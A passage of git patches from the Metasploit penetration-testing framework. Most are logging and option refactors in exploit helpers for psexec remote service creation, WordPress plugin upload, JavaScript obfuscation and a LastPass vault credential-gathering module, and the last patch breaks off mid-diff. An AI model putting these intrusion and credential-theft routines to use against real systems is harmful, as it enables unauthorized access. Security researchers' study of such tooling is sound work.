'json' # Metasm compiler/decompiler/assembler From 537c7e790e030329c8052c188cc6450cd09001e3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 12:51:20 -0600 Subject: [PATCH 235/686] Use vprint_status instead of reimplementing it --- lib/msf/core/exploit/smtp_deliver.rb | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index a4900e8b1c..9ff8693723 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -71,7 +71,7 @@ module Exploit::Remote::SMTPDeliver # This method currently only knows about PLAIN authentication. # def connect_login(global = true) - print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") + vprint_status("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' @@ -114,7 +114,7 @@ module Exploit::Remote::SMTPDeliver else if datastore['PASSWORD'] and datastore["USERNAME"] and not datastore["USERNAME"].empty? # Let the user know their creds are going unused - print_verbose("Server didn't ask for authentication, skipping") + vprint_status("Server didn't ask for authentication, skipping") end end end @@ -170,7 +170,7 @@ module Exploit::Remote::SMTPDeliver end if not already_connected - print_verbose("Closing the connection...") + vprint_status("Closing the connection...") disconnect(nsock) end @@ -187,11 +187,11 @@ module Exploit::Remote::SMTPDeliver return false if not nsock if cmd =~ /AUTH PLAIN/ # Don't print the user's plaintext password - print_verbose("C: AUTH PLAIN ...") + vprint_status("C: AUTH PLAIN ...") else # Truncate because this will include a full email and we don't want # to dump it all. - print_verbose("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") + vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end nsock.put(cmd) @@ -199,17 +199,11 @@ module Exploit::Remote::SMTPDeliver # Don't truncate the server output because it might be helpful for # debugging. - print_verbose("S: #{res.strip}") if res + vprint_status("S: #{res.strip}") if res return res end - def print_verbose(msg) - if datastore['VERBOSE'] - print_status(msg) - end - end - # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 From ad026b3a7ad798e4e4db12431d05c76522b005f5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 13:58:24 -0600 Subject: [PATCH 236/686] Add #peer to Tcp --- lib/msf/core/auxiliary/scanner.rb | 5 ++ lib/msf/core/exploit/http/wordpress/admin.rb | 10 ++-- lib/msf/core/exploit/http/wordpress/base.rb | 2 +- .../core/exploit/http/wordpress/helpers.rb | 4 +- lib/msf/core/exploit/http/wordpress/posts.rb | 16 +++--- lib/msf/core/exploit/http/wordpress/users.rb | 2 +- .../core/exploit/http/wordpress/version.rb | 4 +- lib/msf/core/exploit/smb/client/psexec.rb | 52 +++++++++---------- lib/msf/core/exploit/tcp.rb | 8 +++ .../ui/console/module_command_dispatcher.rb | 8 +-- lib/rex/proto/dcerpc/svcctl/packet.rb | 18 +++---- 11 files changed, 69 insertions(+), 60 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index ac4991cbf0..43b4c4c905 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -42,6 +42,11 @@ def check end +def peer + # IPv4 addr can be 16 chars + 1 for : and + 5 for port + super.ljust(21) +end + # # The command handler when launched from the console # diff --git a/lib/msf/core/exploit/http/wordpress/admin.rb b/lib/msf/core/exploit/http/wordpress/admin.rb index 7fc84f856c..a17f2b6058 100644 --- a/lib/msf/core/exploit/http/wordpress/admin.rb +++ b/lib/msf/core/exploit/http/wordpress/admin.rb @@ -10,10 +10,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin def wordpress_upload_plugin(name, zip, cookie) nonce = wordpress_helper_get_plugin_upload_nonce(cookie) if nonce.nil? - vprint_error("#{peer} - Failed to acquire the plugin upload nonce") + vprint_error("Failed to acquire the plugin upload nonce") return false end - vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}") + vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new @@ -32,11 +32,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin ) if res && res.code == 200 - vprint_status("#{peer} - Uploaded plugin #{name}") + vprint_status("Uploaded plugin #{name}") return true else - vprint_error("#{peer} - Server responded with code #{res.code}") if res - vprint_error("#{peer} - Failed to upload plugin #{name}") + vprint_error("Server responded with code #{res.code}") if res + vprint_error("Failed to upload plugin #{name}") return false end end diff --git a/lib/msf/core/exploit/http/wordpress/base.rb b/lib/msf/core/exploit/http/wordpress/base.rb index 386b6378f9..f25298c868 100644 --- a/lib/msf/core/exploit/http/wordpress/base.rb +++ b/lib/msf/core/exploit/http/wordpress/base.rb @@ -27,7 +27,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Base return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r } return nil rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e - print_error("#{peer} - Error connecting to #{target_uri}: #{e}") + print_error("Error connecting to #{target_uri}: #{e}") return nil end end diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index a9b70dae79..206b0364c7 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -52,7 +52,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) else - message = "#{peer} - Post comment failed." + message = "Post comment failed." message << " Status Code: #{res.code}" if res print_error(message) return nil @@ -67,7 +67,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [Integer,nil] The post id, nil when nothing found def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) range.each { |id| - vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0 + vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) return id if body } diff --git a/lib/msf/core/exploit/http/wordpress/posts.rb b/lib/msf/core/exploit/http/wordpress/posts.rb index 57735bdf4a..ec0f52cff6 100644 --- a/lib/msf/core/exploit/http/wordpress/posts.rb +++ b/lib/msf/core/exploit/http/wordpress/posts.rb @@ -99,11 +99,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts # @param max_redirects [Integer] maximum redirects to follow # @return [Array,nil] String Array with valid blog posts, nil on error def wordpress_get_all_blog_posts_via_feed(max_redirects = 10) - vprint_status("#{peer} - Enumerating Blog posts...") + vprint_status("Enumerating Blog posts...") blog_posts = [] begin - vprint_status("#{peer} - Locating wordpress feed...") + vprint_status("Locating wordpress feed...") res = send_request_cgi({ 'uri' => wordpress_url_rss, 'method' => 'GET' @@ -116,26 +116,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts path = wordpress_helper_parse_location_header(res) return nil unless path - vprint_status("#{peer} - Web server returned a #{res.code}...following to #{path}") + vprint_status("Web server returned a #{res.code}...following to #{path}") res = send_request_cgi({ 'uri' => path, 'method' => 'GET' }) if res.code == 200 - vprint_status("#{peer} - Feed located at #{path}") + vprint_status("Feed located at #{path}") else - vprint_status("#{peer} - Returned a #{res.code}...") + vprint_status("Returned a #{res.code}...") end count = count - 1 end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return nil end if res.nil? or res.code != 200 - vprint_status("#{peer} - Did not recieve HTTP response for RSS feed") + vprint_status("Did not recieve HTTP response for RSS feed") return blog_posts end @@ -143,7 +143,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts links = res.body.scan(/([^<]+)<\/link>/i) if links.nil? or links.empty? - vprint_status("#{peer} - Feed did not have any links present") + vprint_status("Feed did not have any links present") return blog_posts end diff --git a/lib/msf/core/exploit/http/wordpress/users.rb b/lib/msf/core/exploit/http/wordpress/users.rb index 4ddac519ad..98fd963bc8 100644 --- a/lib/msf/core/exploit/http/wordpress/users.rb +++ b/lib/msf/core/exploit/http/wordpress/users.rb @@ -48,7 +48,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users end if res.nil? - print_error("#{peer} - Error getting response.") + print_error("Error getting response.") return nil elsif res.code == 200 and ( diff --git a/lib/msf/core/exploit/http/wordpress/version.rb b/lib/msf/core/exploit/http/wordpress/version.rb index 80c693e56d..3561534b49 100644 --- a/lib/msf/core/exploit/http/wordpress/version.rb +++ b/lib/msf/core/exploit/http/wordpress/version.rb @@ -134,7 +134,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version res = nil readmes.each do |readme_name| readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, readme_name) - vprint_status("#{peer} - Checking #{readme_url}") + vprint_status("Checking #{readme_url}") res = send_request_cgi( 'uri' => readme_url, 'method' => 'GET' @@ -180,7 +180,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version # Could not identify version number return Msf::Exploit::CheckCode::Detected if version.nil? - vprint_status("#{peer} - Found version #{version} of the #{item_type}") + vprint_status("Found version #{version} of the #{item_type}") if fixed_version.nil? if vuln_introduced_version.nil? diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb index bd60e6c675..cb1acf684b 100644 --- a/lib/msf/core/exploit/smb/client/psexec.rb +++ b/lib/msf/core/exploit/smb/client/psexec.rb @@ -74,7 +74,7 @@ module Exploit::Remote::SMB::Client::Psexec simple.disconnect("\\\\#{host}\\#{smbshare}") return contents rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") + print_error("Unable to read file #{file}. #{e.class}: #{e}.") return nil end end @@ -94,16 +94,16 @@ module Exploit::Remote::SMB::Client::Psexec def psexec(command, disconnect=true) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") + vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") + vprint_status("Bound to #{handle} ...") + vprint_status("Obtaining a service manager handle...") svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc) scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST']) if scm_status == ERROR_ACCESS_DENIED - print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager") + print_error("ERROR_ACCESS_DENIED opening the Service Manager") end return false unless scm_handle @@ -114,68 +114,68 @@ module Exploit::Remote::SMB::Client::Psexec opts = {} end - vprint_status("#{peer} - Creating the service...") + vprint_status("Creating the service...") svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS - vprint_good("#{peer} - Successfully created the service") + vprint_good("Successfully created the service") when ERROR_SERVICE_EXISTS service_exists = true - print_warning("#{peer} - Service already exists, opening a handle...") + print_warning("Service already exists, opening a handle...") svc_handle = svc_client.openservicew(scm_handle, service_name) when ERROR_ACCESS_DENIED - print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?") + print_error("Unable to create service, ACCESS_DENIED, did AV gobble your binary?") return false else - print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}") + print_error("Failed to create service, ERROR_CODE: #{svc_status}") return false end if svc_handle.nil? - print_error("#{peer} - No service handle retrieved") + print_error("No service handle retrieved") return false else if service_description - vprint_status("#{peer} - Changing service description...") + vprint_status("Changing service description...") svc_client.changeservicedescription(svc_handle, service_description) end - vprint_status("#{peer} - Starting the service...") + vprint_status("Starting the service...") begin svc_status = svc_client.startservice(svc_handle) case svc_status when ERROR_SUCCESS - print_good("#{peer} - Service started successfully...") + print_good("Service started successfully...") when ERROR_FILE_NOT_FOUND - print_error("#{peer} - Service failed to start - FILE_NOT_FOUND") + print_error("Service failed to start - FILE_NOT_FOUND") when ERROR_ACCESS_DENIED - print_error("#{peer} - Service failed to start - ACCESS_DENIED") + print_error("Service failed to start - ACCESS_DENIED") when ERROR_SERVICE_REQUEST_TIMEOUT - print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...") + print_good("Service start timed out, OK if running a command or non-service executable...") else - print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}") + print_error("Service failed to start, ERROR_CODE: #{svc_status}") end ensure begin # If service already exists don't delete it! # Maybe we could have a force cleanup option..? if service_exists - print_warning("#{peer} - Not removing service as it already existed...") + print_warning("Not removing service as it already existed...") elsif datastore['SERVICE_PERSIST'] - print_warning("#{peer} - Not removing service for persistance...") + print_warning("Not removing service for persistance...") else - vprint_status("#{peer} - Removing the service...") + vprint_status("Removing the service...") svc_status = svc_client.deleteservice(svc_handle) if svc_status == ERROR_SUCCESS - vprint_good("#{peer} - Successfully removed the sevice") + vprint_good("Successfully removed the sevice") else - print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}") + print_error("Unable to remove the service, ERROR_CODE: #{svc_status}") end end ensure - vprint_status("#{peer} - Closing service handle...") + vprint_status("Closing service handle...") svc_client.closehandle(svc_handle) end end @@ -189,10 +189,6 @@ module Exploit::Remote::SMB::Client::Psexec true end - def peer - "#{rhost}:#{rport}" - end - end end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 7c342a3a03..06a588005d 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -195,6 +195,14 @@ module Exploit::Remote::Tcp disconnect end + def print_prefix + if rhost + super + peer + " - " + else + super + end + end + ## # # Wrappers for getters diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 07bcef3693..a78b6f8107 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -193,13 +193,13 @@ module ModuleCommandDispatcher 'LocalOutput' => driver.output) if (code and code.kind_of?(Array) and code.length > 1) if (code == Msf::Exploit::CheckCode::Vulnerable) - print_good("#{peer} - #{code[1]}") + print_good("#{code[1]}") report_vuln(instance) else - print_status("#{peer} - #{code[1]}") + print_status("#{code[1]}") end else - msg = "#{peer} - Check failed: The state could not be determined." + msg = "Check failed: The state could not be determined." print_error(msg) elog("#{msg}\n#{caller.join("\n")}") end @@ -213,7 +213,7 @@ module ModuleCommandDispatcher print_error("Check failed: #{e.message}") elog("#{e.message}\n#{e.backtrace.join("\n")}") rescue ::Exception => e - print_error("#{peer} - Check failed: #{e.class} #{e}") + print_error("Check failed: #{e.class} #{e}") elog("#{e.message}\n#{e.backtrace.join("\n")}") end end diff --git a/lib/rex/proto/dcerpc/svcctl/packet.rb b/lib/rex/proto/dcerpc/svcctl/packet.rb index 6d27f6b849..7e65cb86cd 100644 --- a/lib/rex/proto/dcerpc/svcctl/packet.rb +++ b/lib/rex/proto/dcerpc/svcctl/packet.rb @@ -53,7 +53,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error getting scm handle: #{e}") + print_error("Error getting scm handle: #{e}") end [scm_handle, scm_status] @@ -124,7 +124,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error creating service: #{e}") + print_error("Error creating service: #{e}") end return svc_handle, svc_status @@ -149,7 +149,7 @@ class Client response = dcerpc_client.call(CHANGE_SERVICE_CONFIG2_W, stubdata) # ChangeServiceConfig2 svc_status = error_code(response) rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error changing service description : #{e}") + print_error("Error changing service description : #{e}") end svc_status @@ -169,7 +169,7 @@ class Client svc_status = error_code(response[20,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error closing service handle: #{e}") + print_error("Error closing service handle: #{e}") end svc_status @@ -195,7 +195,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error opening service handle: #{e}") + print_error("Error opening service handle: #{e}") end svc_handle @@ -219,7 +219,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error starting service: #{e}") + print_error("Error starting service: #{e}") end svc_status @@ -249,7 +249,7 @@ class Client svc_status = error_code(response[28,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error controlling service: #{e}") + print_error("Error controlling service: #{e}") end svc_status @@ -268,7 +268,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end svc_status @@ -292,7 +292,7 @@ class Client ret = 2 end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end ret From c2f8e954927eef921612c2ae2f486cf2021c3cfd Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 14:18:19 -0600 Subject: [PATCH 237/686] Missed one --- lib/msf/core/auxiliary/redis.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 20714c8eb3..3b0d3c6e8e 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -48,29 +48,29 @@ module Msf def redis_command(*commands) command_string = printable_redis_response(commands.join(' ')) unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] - vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})") + vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") if (auth_response = send_redis_command('AUTH', datastore['Password'])) unless auth_response =~ /\+OK/ - vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}") + vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return end - vprint_status("#{peer} -- authenticated") + vprint_status("Authenticated") unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end else - vprint_status("#{peer} -- authentication failed; no response") + vprint_status("Authentication failed; no response") return end end - vprint_status("#{peer} -- redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") + vprint_status("Redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") command_response end From 4bd2be5dfa7cae1162a0787361b1c1feafeb1f69 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 28 Jan 2016 14:36:42 -0600 Subject: [PATCH 238/686] Add preserved_identifiers support --- lib/msf/core/exploit/jsobfu.rb | 13 ++++++++++--- tools/exploit/jsobfu.rb | 9 ++++++++- 2 files changed, 18 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/exploit/jsobfu.rb b/lib/msf/core/exploit/jsobfu.rb index 4037df99d7..c1a7a6f609 100644 --- a/lib/msf/core/exploit/jsobfu.rb +++ b/lib/msf/core/exploit/jsobfu.rb @@ -8,7 +8,8 @@ module Msf def initialize(info={}) super register_advanced_options([ - OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]) + OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]), + OptString.new('Identifiers', [false, "Identifiers to preserve for JsObfu"]) ], Exploit::JSObfu) end @@ -18,14 +19,20 @@ module Msf # @param js [String] JavaScript code # @param opts [Hash] obfuscation options # * :iterations [FixNum] Number of times to obfuscate + # * :preserved_identifiers [Array] An array of identifiers to preserve during obfuscation # @return [::Rex::Exploitation::JSObfu] # def js_obfuscate(js, opts={}) iterations = (opts[:iterations] || datastore['JsObfuscate']).to_i + identifiers = (opts[:preserved_identifiers] || datastore['Identifiers'] || '').split(',') obfu = ::Rex::Exploitation::JSObfu.new(js) - obfu.obfuscate(:iterations=>iterations) + obfu_opts = {} + obfu_opts.merge!(iterations: iterations) + obfu_opts.merge!(preserved_identifiers: identifiers) + + obfu.obfuscate(obfu_opts) obfu end end -end \ No newline at end of file +end diff --git a/tools/exploit/jsobfu.rb b/tools/exploit/jsobfu.rb index e491dbc54e..d3417c1612 100755 --- a/tools/exploit/jsobfu.rb +++ b/tools/exploit/jsobfu.rb @@ -32,6 +32,10 @@ module Jsobfu options[:output] = v end + opt.on('-p', '--preserved-identifiers id1,id2', 'The identifiers to preserve') do |v| + options[:preserved_identifiers] = v.split(',') + end + opt.on_tail('-h', '--help', 'Show this message') do $stdout.puts opt exit @@ -67,7 +71,10 @@ module Jsobfu def run original_js = read_js(@opts[:input]) js = ::Rex::Exploitation::JSObfu.new(original_js) - js.obfuscate(:iterations=>@opts[:iteration].to_i) + obfu_opts = {} + obfu_opts.merge!(iterations: @opts[:iteration].to_i) + obfu_opts.merge!(preserved_identifiers: @opts[:preserved_identifiers] || []) + js.obfuscate(obfu_opts) js = js.to_s output_stream = $stdout From f4139f85cb8e68ed797cb16c347e9df88b54c424 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 28 Jan 2016 15:18:25 -0600 Subject: [PATCH 239/686] Change to JsIdentifiers --- lib/msf/core/exploit/jsobfu.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/jsobfu.rb b/lib/msf/core/exploit/jsobfu.rb index c1a7a6f609..518c2a0559 100644 --- a/lib/msf/core/exploit/jsobfu.rb +++ b/lib/msf/core/exploit/jsobfu.rb @@ -9,7 +9,7 @@ module Msf super register_advanced_options([ OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]), - OptString.new('Identifiers', [false, "Identifiers to preserve for JsObfu"]) + OptString.new('JsIdentifiers', [false, "Identifiers to preserve for JsObfu"]) ], Exploit::JSObfu) end @@ -24,7 +24,7 @@ module Msf # def js_obfuscate(js, opts={}) iterations = (opts[:iterations] || datastore['JsObfuscate']).to_i - identifiers = (opts[:preserved_identifiers] || datastore['Identifiers'] || '').split(',') + identifiers = (opts[:preserved_identifiers] || datastore['JsIdentifiers'] || '').split(',') obfu = ::Rex::Exploitation::JSObfu.new(js) obfu_opts = {} obfu_opts.merge!(iterations: iterations) From d51be6e3dad3b7a703c835f86e8d7aaddbe8eeba Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Thu, 28 Jan 2016 16:44:42 -0600 Subject: [PATCH 240/686] Fixing typo This commit fixes a typo in the word "service" --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 2e1fab9064..543ac2c857 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) if sock.nil? - fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable") end add_socket(sock) From 7b4f3f8148966ed6f1d61b68b5c9ae2120c7ebce Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 29 Jan 2016 11:52:21 +1000 Subject: [PATCH 241/686] Remove -vv, restore -v and add -ci --- lib/msf/base/serializer/readable_text.rb | 29 ++++++++++--------- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++---- 2 files changed, 21 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 5b20981a9c..b93cd55bc0 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,20 +524,18 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - extended = opts[:extended] || false + show_checkin = opts[:show_checkin] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap return dump_sessions_verbose(framework, opts) if verbose - columns = - [ - 'Id', - 'Type', - 'Information', - 'Connection' - ] - columns << 'Checkin?' if extended + columns = [] + columns << 'Id' + columns << 'Type' + columns << 'Checkin?' if show_checkin + columns << 'Information' + columns << 'Connection' tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -553,12 +551,12 @@ class ReadableText sinfo = sinfo[0,77] + "..." end - row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to?(:platform) - row[1] << (" " + session.platform) - end + row = [] + row << session.sid.to_s + row << session.type.to_s + row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if extended + if show_checkin if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else @@ -566,6 +564,9 @@ class ReadableText end end + row << sinfo + row << session.tunnel_to_s + " (#{session.session_host})" + tbl << row } diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e129744ff3..d5080f9f40 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,11 +35,11 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List extended fields" ], - "-vv" => [ false, "Render in verbose mode" ], + "-v" => [ false, "List sessions in verbose mode" ], "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - extended = false + show_checkin = false verbose = false sid = nil cmds = [] @@ -1781,9 +1781,9 @@ class Core when "-c" method = 'cmd' cmds << val if val + when "-ci" + show_checkin = true when "-v" - extended = true - when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) print_line end From 6fb27a3da908e7654b13427d6cbec9a56558c677 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 28 Jan 2016 23:49:50 -0600 Subject: [PATCH 242/686] Undo path and move the out of bound check --- modules/post/multi/gather/lastpass_creds.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 7e84160e33..6671ae40b5 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -404,7 +404,7 @@ class Metasploit3 < Msf::Post if browser.match(/Firefox|IE/) if browser == "Firefox" iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" - vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" + vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" else # IE iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" @@ -709,17 +709,17 @@ class Metasploit3 < Msf::Post labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] vault_data = [] for label in labels + if chunk[pointer..pointer + 3].nil? + # Out of bound read + return nil + end + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") decrypted_data = "" if decrypted_data.nil? vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") pointer = pointer + 4 + length - - if chunk[pointer..pointer + 3].nil? - # Out of bound read - return nil - end end return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes From b049debef0b9f3e865c2ad4259607a8f673106ca Mon Sep 17 00:00:00 2001 From: Micheal Date: Thu, 28 Jan 2016 23:29:01 -0800 Subject: [PATCH 243/686] Fixes as recommended in the PR discussion. --- .../multi/postgres/postgres_createlang.rb | 21 ++++++++----------- 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb 